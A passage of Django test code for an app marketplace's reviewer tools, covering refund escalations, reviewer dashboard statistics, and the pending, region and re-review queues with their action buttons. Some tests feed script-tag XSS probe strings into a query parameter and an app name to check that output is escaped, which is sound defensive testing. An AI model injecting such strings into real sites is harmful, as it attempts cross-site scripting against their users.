            applog.update(created=created)

    def test_multiple_refunds_same_user(self):
        self._purchase(self.user1)
        self._refund(self.user1)
        self._refund(self.user1)
        # Multiple refunds from one user still count against the ratio.
        eq_(Refund.recent_refund_ratio(
            self.app.id, datetime.datetime.now() - datetime.timedelta(days=1)),
            1.0)

    def test_no_refunds(self):
        find_refund_escalations(self.app.id)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)

    def test_refunds(self):
        self._purchase(self.user1)
        self._purchase(self.user2)
        self._refund(self.user1)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)

    def test_refunds_already_escalated(self):
        self._purchase(self.user1)
        self._purchase(self.user2)
        self._refund(self.user1)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)
        # Task was run on Refund.post_save, re-run task to make sure we don't
        # escalate again.
        find_refund_escalations(self.app.id)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)

    def test_refunds_cleared_not_escalated(self):
        stamp = datetime.datetime.now() - datetime.timedelta(days=2)
        self._purchase(self.user1, stamp)
        self._purchase(self.user2, stamp)
        self._refund(self.user1, stamp)

        # Simulate a reviewer clearing an escalation...
        # remove app from queue and write a log.
        EscalationQueue.objects.filter(addon=self.app).delete()
        amo.log(amo.LOG.ESCALATION_CLEARED, self.app, self.app.current_version,
                details={'comments': 'All clear'})
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)

        # Task will find it again but not add it again.
        find_refund_escalations(self.app.id)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)

    def test_older_refund_escalations_then_new(self):
        stamp = datetime.datetime.now() - datetime.timedelta(days=2)
        self._purchase(self.user1, stamp)
        self._purchase(self.user2, stamp)
        # Triggers 33% for refund / purchase ratio.
        self._refund(self.user1, stamp)

        # Simulate a reviewer clearing an escalation...
        # remove app from queue and write a log.
        EscalationQueue.objects.filter(addon=self.app).delete()
        amo.log(amo.LOG.ESCALATION_CLEARED, self.app, self.app.current_version,
                details={'comments': 'All ok'})
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)

        # Task will find it again but not add it again.
        find_refund_escalations(self.app.id)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)

        # Issue another refund, which should trigger another escalation.
        self._purchase(self.user3)
        self._refund(self.user3)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)

    def test_already_escalated_for_other_still_logs(self):
        # Add app to queue for abuse reports.
        EscalationQueue.objects.create(addon=self.app)
        amo.log(amo.LOG.ESCALATED_HIGH_ABUSE, self.app,
                self.app.current_version, details={'comments': 'abuse'})

        # Set up purchases.
        stamp = datetime.datetime.now() - datetime.timedelta(days=2)
        self._purchase(self.user1, stamp)
        self._purchase(self.user2, stamp)
        # Triggers 33% for refund / purchase ratio.
        self._refund(self.user1, stamp)

        # Verify it logged the high refunds.
        action = amo.LOG.ESCALATED_HIGH_REFUNDS
        assert AppLog.objects.filter(
            addon=self.app, activity_log__action=action.id).exists(), (
                u'Expected high refunds to be logged')
########NEW FILE########
__FILENAME__ = test_utils_
# -*- coding: utf8 -*-
import amo.tests
from mkt.reviewers.utils import create_sort_link
class TestCreateSortLink(amo.tests.TestCase):
    """Test that the sortable table headers' have URLs created correctly."""

    def test_sort_asc_created(self):
        """
        Test that name's link sorts by asc if already sorting by created.
        """
        link = create_sort_link('Name', 'name', [('text_query', 'irrel')],
                                'created', 'desc')
        assert 'sort=name' in link
        assert 'order=asc' in link
        assert 'text_query=irrel' in link

    def test_sort_invert_created(self):
        """
        Test that created's link inverts order if already sorting by created.
        """
        link = create_sort_link('Waiting Time', 'created',
                                [('text_query', 'guybrush')], 'created',
                                'asc')
        assert 'sort=created' in link
        assert 'order=desc' in link
        assert 'text_query=guybrush' in link

        # Sorting desc on the same column flips back to asc.
        link = create_sort_link('Waiting Time', 'created', [], 'created',
                                'desc')
        assert 'order=asc' in link

    def test_no_xss(self):
        # GET parameters must be escaped when echoed into the link.
        link = create_sort_link('Waiting Time', 'created',
                                [('script', '<script>alert("BIB");</script>')],
                                'created', 'asc')
        assert '<script>' not in link

    def test_unicode(self):
        # Non-ASCII query values must be URL-encoded, not mangled.
        link = create_sort_link('Name', 'name', [('text_query', 'Feliz Año')],
                                'created', 'desc')
        assert 'sort=name' in link
        assert 'order=asc' in link
        assert 'text_query=Feliz+A%C3%B1o' in link
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import datetime
import json
import os
import time
from itertools import cycle
from os import path
from django.conf import settings
from django.core import mail
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.test.client import RequestFactory
from django.test.utils import override_settings
from django.utils import translation
import mock
import requests
from nose import SkipTest
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
from requests.structures import CaseInsensitiveDict
import amo
import amo.tests
from abuse.models import AbuseReport
from access.models import Group, GroupUser
from addons.models import AddonDeviceType
from amo.helpers import absolutify, urlparams
from amo.tests import (app_factory, check_links, days_ago, formset, initial,
req_factory_factory, user_factory, version_factory)
from amo.utils import isotime
from cache_nuggets.lib import Token
from devhub.models import ActivityLog, ActivityLogAttachment, AppLog
from editors.models import (CannedResponse, EscalationQueue, RereviewQueue,
ReviewerScore)
from files.models import File
from lib.crypto import packaged
from lib.crypto.tests import mock_sign
from reviews.models import Review, ReviewFlag
from tags.models import Tag
from users.models import UserProfile
from versions.models import Version
from zadmin.models import get_config, set_config
import mkt
import mkt.ratings
from mkt.comm.utils import create_comm_note
from mkt.constants import comm
from mkt.constants.features import FeatureProfile
from mkt.reviewers.views import (_do_sort, _progress, app_review, queue_apps,
route_reviewer)
from mkt.site.fixtures import fixture
from mkt.submit.tests.test_views import BasePackagedAppTest
from mkt.webapps.models import Webapp
from mkt.webapps.tests.test_models import PackagedFilesMixin
TEST_PATH = path.dirname(path.abspath(__file__))
ATTACHMENTS_DIR = path.abspath(path.join(TEST_PATH, '..', '..', 'comm',
'tests', 'attachments'))
class AttachmentManagementMixin(object):
    """Helpers for building formset POST data with review attachments."""

    def _attachment_management_form(self, num=1):
        """
        Generate and return data for a management form for `num` attachments
        """
        return {'attachment-TOTAL_FORMS': max(1, num),
                'attachment-INITIAL_FORMS': 0,
                'attachment-MAX_NUM_FORMS': 1000}

    def _attachments(self, num):
        """Generate and return data for `num` attachments """
        data = {}
        files = ['bacon.jpg', 'bacon.txt']
        descriptions = ['mmm, bacon', '']
        if num > 0:
            for n in xrange(num):
                # Alternate between the two fixture files/descriptions.
                i = 0 if n % 2 else 1
                # NOTE(review): handles are opened here and never explicitly
                # closed; presumably the test client consumes them — confirm.
                attachment = open(path.join(ATTACHMENTS_DIR, files[i]), 'r+')
                data.update({
                    'attachment-%d-attachment' % n: attachment,
                    'attachment-%d-description' % n: descriptions[i]
                })
        return data
class AppReviewerTest(amo.tests.TestCase):
    """Base test case providing reviewer logins and action-button checks."""
    fixtures = ['base/users']

    def setUp(self):
        self.login_as_editor()

    def login_as_admin(self):
        self.login('[email protected]')

    def login_as_editor(self):
        self.login('[email protected]')

    def login_as_senior_reviewer(self):
        # Senior reviewers are editors granted extra app-review permissions.
        self.client.logout()
        user = UserProfile.objects.get(email='[email protected]')
        self.grant_permission(user, 'Apps:Edit,Apps:ReviewEscalated,'
                                    'Apps:ReviewPrivileged')
        self.login_as_editor()

    def check_actions(self, expected, elements):
        """Check the action buttons on the review page.

        `expected` is a list of tuples containing action name and action form
        value. `elements` is a PyQuery list of input elements.
        """
        for idx, item in enumerate(expected):
            text, form_value = item
            e = elements.eq(idx)
            eq_(e.parent().text(), text)
            eq_(e.attr('name'), 'action')
            eq_(e.val(), form_value)
class AccessMixin(object):
    """Shared access checks: non-editors get 403, anonymous users get 302."""

    def test_403_for_non_editor(self, *args, **kwargs):
        assert self.client.login(username='[email protected]',
                                 password='password')
        eq_(self.client.head(self.url).status_code, 403)

    def test_302_for_anonymous(self, *args, **kwargs):
        self.client.logout()
        eq_(self.client.head(self.url).status_code, 302)
class SearchMixin(object):
    """Shared smoke test that queue pages accept text search queries."""

    def test_search_query(self):
        # Light test to make sure queues can handle search queries.
        res = self.client.get(self.url, {'text_query': 'test'})
        eq_(res.status_code, 200)
class TestReviewersHome(AppReviewerTest, AccessMixin):
    """Tests for the reviewers dashboard: queue counts, progress stats and
    reviewer leaderboards rendered on the home page."""
    def setUp(self):
        self.login_as_editor()
        super(TestReviewersHome, self).setUp()
        self.url = reverse('reviewers.home')
        # Three pending apps feed the "pending" queue counts below.
        self.apps = [app_factory(name='Antelope',
                                 status=amo.STATUS_PENDING),
                     app_factory(name='Bear',
                                 status=amo.STATUS_PENDING),
                     app_factory(name='Cougar',
                                 status=amo.STATUS_PENDING)]
        # A public packaged app with a pending version feeds the "updates"
        # queue count.
        self.packaged_app = app_factory(name='Dinosaur',
                                        status=amo.STATUS_PUBLIC,
                                        is_packaged=True)
        version_factory(addon=self.packaged_app,
                        file_kw={'status': amo.STATUS_PENDING})
        # Add a disabled app for good measure.
        app_factory(name='Elephant', disabled_by_user=True,
                    status=amo.STATUS_PENDING)
        # Escalate one app to make sure it doesn't affect stats.
        escalated = app_factory(name='Eyelash Pit Viper',
                                status=amo.STATUS_PENDING)
        EscalationQueue.objects.create(addon=escalated)
        # Add a public app under re-review.
        rereviewed = app_factory(name='Finch', status=amo.STATUS_PUBLIC)
        rq = RereviewQueue.objects.create(addon=rereviewed)
        rq.update(created=self.days_ago(1))
        # Add an app with latest update deleted. It shouldn't affect anything.
        app = app_factory(name='Great White Shark',
                          status=amo.STATUS_PUBLIC,
                          version_kw={'version': '1.0'},
                          is_packaged=True)
        v = version_factory(addon=app,
                            version='2.1',
                            file_kw={'status': amo.STATUS_PENDING})
        v.update(deleted=True)
    def test_route_reviewer(self):
        # App reviewers go to apps home.
        req = amo.tests.req_factory_factory(
            reverse('reviewers'),
            user=UserProfile.objects.get(username='editor'))
        r = route_reviewer(req)
        self.assert3xx(r, reverse('reviewers.home'))
    def test_progress_pending(self):
        # Spread nominations across the new / med / old age buckets.
        self.apps[0].latest_version.update(nomination=self.days_ago(1))
        self.apps[1].latest_version.update(nomination=self.days_ago(8))
        self.apps[2].latest_version.update(nomination=self.days_ago(15))
        counts, percentages = _progress()
        eq_(counts['pending']['week'], 1)
        eq_(counts['pending']['new'], 1)
        eq_(counts['pending']['old'], 1)
        eq_(counts['pending']['med'], 1)
        # One app in each bucket -> a third of the total each.
        self.assertAlmostEqual(percentages['pending']['new'], 33.333333333333)
        self.assertAlmostEqual(percentages['pending']['old'], 33.333333333333)
        self.assertAlmostEqual(percentages['pending']['med'], 33.333333333333)
    def test_progress_rereview(self):
        rq = RereviewQueue.objects.create(addon=self.apps[0])
        rq.update(created=self.days_ago(8))
        rq = RereviewQueue.objects.create(addon=self.apps[1])
        rq.update(created=self.days_ago(15))
        counts, percentages = _progress()
        eq_(counts['rereview']['week'], 1)
        eq_(counts['rereview']['new'], 1)
        eq_(counts['rereview']['old'], 1)
        eq_(counts['rereview']['med'], 1)
        self.assertAlmostEqual(percentages['rereview']['new'], 33.333333333333)
        self.assertAlmostEqual(percentages['rereview']['old'], 33.333333333333)
        self.assertAlmostEqual(percentages['rereview']['med'], 33.333333333333)
    def test_progress_updated(self):
        # Two extra public packaged apps with pending updates of different
        # nomination ages.
        extra_app = app_factory(name='Jackalope',
                                status=amo.STATUS_PUBLIC,
                                is_packaged=True,
                                created=self.days_ago(35))
        version_factory(addon=extra_app,
                        file_kw={'status': amo.STATUS_PENDING},
                        created=self.days_ago(25),
                        nomination=self.days_ago(8))
        extra_app = app_factory(name='Jackrabbit',
                                status=amo.STATUS_PUBLIC,
                                is_packaged=True,
                                created=self.days_ago(35))
        version_factory(addon=extra_app,
                        file_kw={'status': amo.STATUS_PENDING},
                        created=self.days_ago(25),
                        nomination=self.days_ago(25))
        counts, percentages = _progress()
        eq_(counts['updates']['week'], 1)
        eq_(counts['updates']['new'], 1)
        eq_(counts['updates']['old'], 1)
        eq_(counts['updates']['med'], 1)
        self.assertAlmostEqual(percentages['updates']['new'], 33.333333333333)
        self.assertAlmostEqual(percentages['updates']['old'], 33.333333333333)
        self.assertAlmostEqual(percentages['updates']['med'], 33.333333333333)
    def test_stats_waiting(self):
        self.apps[0].latest_version.update(nomination=self.days_ago(1))
        self.apps[1].latest_version.update(nomination=self.days_ago(5))
        self.apps[2].latest_version.update(nomination=self.days_ago(15))
        self.packaged_app.update(created=self.days_ago(1))
        doc = pq(self.client.get(self.url).content)
        anchors = doc('.editor-stats-title a')
        eq_(anchors.eq(0).text(), '3 Pending App Reviews')
        eq_(anchors.eq(1).text(), '1 Re-review')
        eq_(anchors.eq(2).text(), '1 Update Review')
        divs = doc('.editor-stats-table > div')
        # Pending review.
        eq_(divs.eq(0).text(), '2 unreviewed app submissions this week.')
        # Re-reviews.
        eq_(divs.eq(2).text(), '1 unreviewed app submission this week.')
        # Update review.
        eq_(divs.eq(4).text(), '1 unreviewed app submission this week.')
        # Maths.
        # Pending review.
        eq_(doc('.waiting_new').eq(0).attr('title')[-3:], '33%')
        eq_(doc('.waiting_med').eq(0).attr('title')[-3:], '33%')
        eq_(doc('.waiting_old').eq(0).attr('title')[-3:], '33%')
        # Re-reviews.
        eq_(doc('.waiting_new').eq(1).attr('title')[-4:], '100%')
        eq_(doc('.waiting_med').eq(1).attr('title')[-3:], ' 0%')
        eq_(doc('.waiting_old').eq(1).attr('title')[-3:], ' 0%')
        # Update review.
        eq_(doc('.waiting_new').eq(2).attr('title')[-4:], '100%')
        eq_(doc('.waiting_med').eq(2).attr('title')[-3:], ' 0%')
        eq_(doc('.waiting_old').eq(2).attr('title')[-3:], ' 0%')
    def test_reviewer_leaders(self):
        reviewers = UserProfile.objects.all()[:2]
        # 1st user reviews 2, 2nd user only 1.
        users = cycle(reviewers)
        for app in self.apps:
            amo.log(amo.LOG.APPROVE_VERSION, app, app.current_version,
                    user=users.next(), details={'comments': 'hawt'})
        doc = pq(self.client.get(self.url).content.decode('utf-8'))
        # Top Reviews.
        table = doc('#editors-stats .editor-stats-table').eq(0)
        eq_(table.find('td').eq(0).text(), reviewers[0].name)
        eq_(table.find('td').eq(1).text(), u'2')
        eq_(table.find('td').eq(2).text(), reviewers[1].name)
        eq_(table.find('td').eq(3).text(), u'1')
        # Top Reviews this month.
        table = doc('#editors-stats .editor-stats-table').eq(1)
        eq_(table.find('td').eq(0).text(), reviewers[0].name)
        eq_(table.find('td').eq(1).text(), u'2')
        eq_(table.find('td').eq(2).text(), reviewers[1].name)
        eq_(table.find('td').eq(3).text(), u'1')
class FlagsMixin(object):
    """Mixin: the queue's flags column renders the expected sprite icons."""
    def test_flag_packaged_app(self):
        self.apps[0].update(is_packaged=True)
        eq_(self.apps[0].is_packaged, True)
        response = self.client.get(self.url)
        eq_(response.status_code, 200)
        first_cell = pq(response.content)('#addon-queue tbody tr td.flags').eq(0)
        eq_(first_cell('div.sprite-reviewer-packaged-app').length, 1)
    def test_flag_premium_app(self):
        self.apps[0].update(premium_type=amo.ADDON_PREMIUM)
        eq_(self.apps[0].is_premium(), True)
        response = self.client.get(self.url)
        eq_(response.status_code, 200)
        cells = pq(response.content)('#addon-queue tbody tr td.flags')
        eq_(cells('div.sprite-reviewer-premium').length, 1)
    def test_flag_free_inapp_app(self):
        self.apps[0].update(premium_type=amo.ADDON_FREE_INAPP)
        response = self.client.get(self.url)
        cells = pq(response.content)('#addon-queue tbody tr td.flags')
        eq_(cells('div.sprite-reviewer-premium.inapp.free').length, 1)
    def test_flag_premium_inapp_app(self):
        self.apps[0].update(premium_type=amo.ADDON_PREMIUM_INAPP)
        response = self.client.get(self.url)
        cells = pq(response.content)('#addon-queue tbody tr td.flags')
        eq_(cells('div.sprite-reviewer-premium.inapp').length, 1)
    def test_flag_info(self):
        # An outstanding information request shows the "info" sprite.
        self.apps[0].current_version.update(has_info_request=True)
        response = self.client.get(self.url)
        eq_(response.status_code, 200)
        cells = pq(response.content)('#addon-queue tbody tr td.flags')
        eq_(cells('div.sprite-reviewer-info').length, 1)
    def test_flag_comment(self):
        # An editor comment on the version shows the "editor" sprite.
        self.apps[0].current_version.update(has_editor_comment=True)
        response = self.client.get(self.url)
        eq_(response.status_code, 200)
        cells = pq(response.content)('#addon-queue tbody tr td.flags')
        eq_(cells('div.sprite-reviewer-editor').length, 1)
class XSSMixin(object):
    """Mixin: an app name containing markup must be HTML-escaped in the
    queue listing."""
    def test_xss_in_queue(self):
        a = self.apps[0]
        a.name = '<script>alert("xss")</script>'
        a.save()
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        tbody = pq(res.content)('#addon-queue tbody').html()
        # The name must appear escaped, never as a live <script> tag.
        # (The original pair of asserts checked the same raw string both
        # in and not in tbody -- the escaped entities had been mangled.)
        assert '&lt;script&gt;' in tbody
        assert '<script>' not in tbody
class TestAppQueue(AppReviewerTest, AccessMixin, FlagsMixin, SearchMixin,
                   XSSMixin):
    """Tests for the pending-apps review queue: listing, counts, and the
    review-action buttons available per app state."""
    fixtures = ['base/users']
    def setUp(self):
        # Two pending apps (XXX older than YYY) plus one app that is only
        # in the re-review queue, so it must not appear in this queue.
        self.apps = [app_factory(name='XXX',
                                 status=amo.STATUS_PENDING,
                                 version_kw={'nomination': self.days_ago(2)},
                                 file_kw={'status': amo.STATUS_PENDING}),
                     app_factory(name='YYY',
                                 status=amo.STATUS_PENDING,
                                 version_kw={'nomination': self.days_ago(1)},
                                 file_kw={'status': amo.STATUS_PENDING}),
                     app_factory(name='ZZZ')]
        self.apps[0].update(created=self.days_ago(2))
        self.apps[1].update(created=self.days_ago(1))
        RereviewQueue.objects.create(addon=self.apps[2])
        self.login_as_editor()
        self.url = reverse('reviewers.apps.queue_pending')
    def review_url(self, app):
        # Review-page URL for a given app.
        return reverse('reviewers.apps.review', args=[app.app_slug])
    def test_queue_viewing_ping(self):
        eq_(self.client.post(reverse('editors.queue_viewing')).status_code,
            200)
    def test_template_links(self):
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        links = pq(r.content)('#addon-queue tbody')('tr td:nth-of-type(2) a')
        apps = Webapp.objects.pending().order_by('created')
        expected = [
            (unicode(apps[0].name), self.review_url(apps[0])),
            (unicode(apps[1].name), self.review_url(apps[1])),
        ]
        check_links(expected, links, verify=False)
    def test_action_buttons_pending(self):
        r = self.client.get(self.review_url(self.apps[0]))
        eq_(r.status_code, 200)
        actions = pq(r.content)('#review-actions input')
        expected = [
            (u'Push to public', 'public'),
            (u'Reject', 'reject'),
            (u'Escalate', 'escalate'),
            (u'Request more information', 'info'),
            (u'Comment', 'comment'),
        ]
        self.check_actions(expected, actions)
    def test_action_buttons_rejected(self):
        # Check action buttons for a previously rejected app.
        self.apps[0].update(status=amo.STATUS_REJECTED)
        self.apps[0].latest_version.files.update(status=amo.STATUS_DISABLED)
        r = self.client.get(self.review_url(self.apps[0]))
        eq_(r.status_code, 200)
        actions = pq(r.content)('#review-actions input')
        expected = [
            (u'Push to public', 'public'),
            (u'Escalate', 'escalate'),
            (u'Request more information', 'info'),
            (u'Comment', 'comment'),
        ]
        self.check_actions(expected, actions)
    @mock.patch('versions.models.Version.is_privileged', True)
    def test_action_buttons_privileged_cantreview(self):
        # Regular reviewers cannot approve/reject privileged apps: only
        # escalate / info / comment remain.
        self.apps[0].update(is_packaged=True)
        self.apps[0].latest_version.files.update(status=amo.STATUS_PENDING)
        r = self.client.get(self.review_url(self.apps[0]))
        eq_(r.status_code, 200)
        actions = pq(r.content)('#review-actions input')
        expected = [
            (u'Escalate', 'escalate'),
            (u'Request more information', 'info'),
            (u'Comment', 'comment'),
        ]
        self.check_actions(expected, actions)
    @mock.patch('versions.models.Version.is_privileged', True)
    def test_action_buttons_privileged_canreview(self):
        # Senior reviewers get the full action set on privileged apps.
        self.login_as_senior_reviewer()
        self.apps[0].update(is_packaged=True)
        self.apps[0].latest_version.files.update(status=amo.STATUS_PENDING)
        r = self.client.get(self.review_url(self.apps[0]))
        eq_(r.status_code, 200)
        actions = pq(r.content)('#review-actions input')
        expected = [
            (u'Push to public', 'public'),
            (u'Reject', 'reject'),
            (u'Disable app', 'disable'),
            (u'Escalate', 'escalate'),
            (u'Request more information', 'info'),
            (u'Comment', 'comment'),
        ]
        self.check_actions(expected, actions)
    def test_devices(self):
        AddonDeviceType.objects.create(addon=self.apps[0], device_type=1)
        AddonDeviceType.objects.create(addon=self.apps[0], device_type=2)
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        tds = pq(r.content)('#addon-queue tbody')('tr td:nth-of-type(5)')
        eq_(tds('ul li:not(.unavailable)').length, 2)
    def test_payments(self):
        self.apps[0].update(premium_type=amo.ADDON_PREMIUM)
        self.apps[1].update(premium_type=amo.ADDON_FREE_INAPP)
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        tds = pq(r.content)('#addon-queue tbody')('tr td:nth-of-type(6)')
        eq_(tds.eq(0).text(),
            unicode(amo.ADDON_PREMIUM_TYPES[amo.ADDON_PREMIUM]))
        eq_(tds.eq(1).text(),
            unicode(amo.ADDON_PREMIUM_TYPES[amo.ADDON_FREE_INAPP]))
    def test_invalid_page(self):
        # Out-of-range page numbers fall back to page 1.
        r = self.client.get(self.url, {'page': 999})
        eq_(r.status_code, 200)
        eq_(r.context['pager'].number, 1)
    def test_queue_count(self):
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (2)')
        eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (1)')
        eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
        eq_(doc('.tabnav li a:eq(3)').text(), u'Moderated Reviews (0)')
    def test_queue_count_senior_reviewer(self):
        # Senior reviewers see an extra Escalations tab.
        self.login_as_senior_reviewer()
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (2)')
        eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (1)')
        eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
        eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (0)')
        eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (0)')
    def test_escalated_not_in_queue(self):
        self.login_as_senior_reviewer()
        EscalationQueue.objects.create(addon=self.apps[0])
        res = self.client.get(self.url)
        # self.apps[2] is not pending so doesn't show up either.
        eq_([a.app for a in res.context['addons']], [self.apps[1]])
        doc = pq(res.content)
        eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (1)')
        eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (1)')
        eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
        eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (1)')
        eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (0)')
    def test_incomplete_no_in_queue(self):
        # Test waffle-less.
        [app.update(status=amo.STATUS_NULL) for app in self.apps]
        req = req_factory_factory(self.url,
            user=UserProfile.objects.get(username='editor'))
        doc = pq(queue_apps(req).content)
        assert not doc('#addon-queue tbody tr').length
class TestRegionQueue(AppReviewerTest, AccessMixin, FlagsMixin, SearchMixin,
                      XSSMixin):
    """Tests for the per-region (China) review queue listing."""
    fixtures = ['base/users']
    def setUp(self):
        self.apps = [app_factory(name='WWW',
                                 status=amo.STATUS_PUBLIC),
                     app_factory(name='XXX',
                                 status=amo.STATUS_PUBLIC_WAITING),
                     app_factory(name='YYY',
                                 status=amo.STATUS_PUBLIC),
                     app_factory(name='ZZZ',
                                 status=amo.STATUS_PENDING)]
        # WWW and XXX are the only ones actually requested to be public.
        self.apps[0].geodata.update(region_cn_status=amo.STATUS_PENDING,
                                    region_cn_nominated=self.days_ago(2))
        self.apps[1].geodata.update(region_cn_status=amo.STATUS_PENDING,
                                    region_cn_nominated=self.days_ago(1))
        self.apps[2].geodata.update(region_cn_status=amo.STATUS_PUBLIC)
        self.user = UserProfile.objects.get(username='editor')
        # The region queue requires its own permission.
        self.grant_permission(self.user, 'Apps:ReviewRegionCN')
        self.login_as_editor()
        self.url = reverse('reviewers.apps.queue_region',
                           args=[mkt.regions.CN.slug])
    def test_template_links(self):
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        links = pq(r.content)('.regional-queue tbody tr td:first-child a')
        apps = Webapp.objects.pending_in_region('cn').order_by(
            '_geodata__region_cn_nominated')
        src = '?src=queue-region-cn'
        expected = [
            (unicode(apps[0].name), apps[0].get_url_path() + src),
            (unicode(apps[1].name), apps[1].get_url_path() + src),
        ]
        check_links(expected, links, verify=False)
    def test_escalated_not_in_queue(self):
        self.login_as_senior_reviewer()
        self.apps[0].escalationqueue_set.create()
        res = self.client.get(self.url)
        eq_([a.app for a in res.context['addons']], [self.apps[1]])
@mock.patch('versions.models.Version.is_privileged', False)
class TestRereviewQueue(AppReviewerTest, AccessMixin, FlagsMixin, SearchMixin,
                        XSSMixin):
    """Tests for the re-review queue: ordering by queue-entry creation time,
    counts, and review-action buttons for apps under re-review."""
    fixtures = ['base/users']
    def setUp(self):
        # Three apps queued for re-review at staggered times (XXX oldest).
        self.apps = [app_factory(name='XXX'),
                     app_factory(name='YYY'),
                     app_factory(name='ZZZ')]
        RereviewQueue.objects.create(addon=self.apps[0]).update(
            created=self.days_ago(5))
        RereviewQueue.objects.create(addon=self.apps[1]).update(
            created=self.days_ago(3))
        RereviewQueue.objects.create(addon=self.apps[2]).update(
            created=self.days_ago(1))
        self.apps[0].update(created=self.days_ago(5))
        self.apps[1].update(created=self.days_ago(3))
        self.apps[2].update(created=self.days_ago(1))
        self.login_as_editor()
        self.url = reverse('reviewers.apps.queue_rereview')
    def review_url(self, app):
        # Review-page URL for a given app.
        return reverse('reviewers.apps.review', args=[app.app_slug])
    def test_template_links(self):
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        links = pq(r.content)('#addon-queue tbody')('tr td:nth-of-type(2) a')
        apps = [rq.addon for rq in
                RereviewQueue.objects.all().order_by('created')]
        expected = [
            (unicode(apps[0].name), self.review_url(apps[0])),
            (unicode(apps[1].name), self.review_url(apps[1])),
            (unicode(apps[2].name), self.review_url(apps[2])),
        ]
        check_links(expected, links, verify=False)
    def test_waiting_time(self):
        """Check objects show queue objects' created."""
        r = self.client.get(self.url)
        waiting_times = [wait.attrib['isotime'] for wait in
                         pq(r.content)('td time')]
        expected_waiting_times = [
            isotime(app.rereviewqueue_set.all()[0].created)
            for app in self.apps]
        self.assertSetEqual(expected_waiting_times, waiting_times)
    def test_action_buttons_public_senior_reviewer(self):
        self.login_as_senior_reviewer()
        r = self.client.get(self.review_url(self.apps[0]))
        eq_(r.status_code, 200)
        actions = pq(r.content)('#review-actions input')
        expected = [
            (u'Reject', 'reject'),
            (u'Disable app', 'disable'),
            (u'Clear Re-review', 'clear_rereview'),
            (u'Escalate', 'escalate'),
            (u'Request more information', 'info'),
            (u'Comment', 'comment'),
        ]
        self.check_actions(expected, actions)
    def test_action_buttons_public(self):
        r = self.client.get(self.review_url(self.apps[0]))
        eq_(r.status_code, 200)
        actions = pq(r.content)('#review-actions input')
        expected = [
            (u'Reject', 'reject'),
            (u'Clear Re-review', 'clear_rereview'),
            (u'Escalate', 'escalate'),
            (u'Request more information', 'info'),
            (u'Comment', 'comment'),
        ]
        self.check_actions(expected, actions)
    def test_action_buttons_reject(self):
        self.apps[0].update(status=amo.STATUS_REJECTED)
        self.apps[0].latest_version.files.update(status=amo.STATUS_DISABLED)
        r = self.client.get(self.review_url(self.apps[0]))
        eq_(r.status_code, 200)
        actions = pq(r.content)('#review-actions input')
        expected = [
            (u'Push to public', 'public'),
            (u'Clear Re-review', 'clear_rereview'),
            (u'Escalate', 'escalate'),
            (u'Request more information', 'info'),
            (u'Comment', 'comment'),
        ]
        self.check_actions(expected, actions)
    def test_invalid_page(self):
        # Out-of-range page numbers fall back to page 1.
        r = self.client.get(self.url, {'page': 999})
        eq_(r.status_code, 200)
        eq_(r.context['pager'].number, 1)
    def test_queue_count(self):
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
        eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (3)')
        eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
        eq_(doc('.tabnav li a:eq(3)').text(), u'Moderated Reviews (0)')
    def test_queue_count_senior_reviewer(self):
        # Senior reviewers see an extra Escalations tab.
        self.login_as_senior_reviewer()
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
        eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (3)')
        eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
        eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (0)')
        eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (0)')
    def test_escalated_not_in_queue(self):
        self.login_as_senior_reviewer()
        EscalationQueue.objects.create(addon=self.apps[0])
        res = self.client.get(self.url)
        self.assertSetEqual([a.app for a in res.context['addons']],
                            self.apps[1:])
        doc = pq(res.content)
        eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
        eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (2)')
        eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
        eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (1)')
        eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (0)')
    def test_addon_deleted(self):
        # Deleting an app must drop its re-review queue entry.
        app = self.apps[0]
        app.delete()
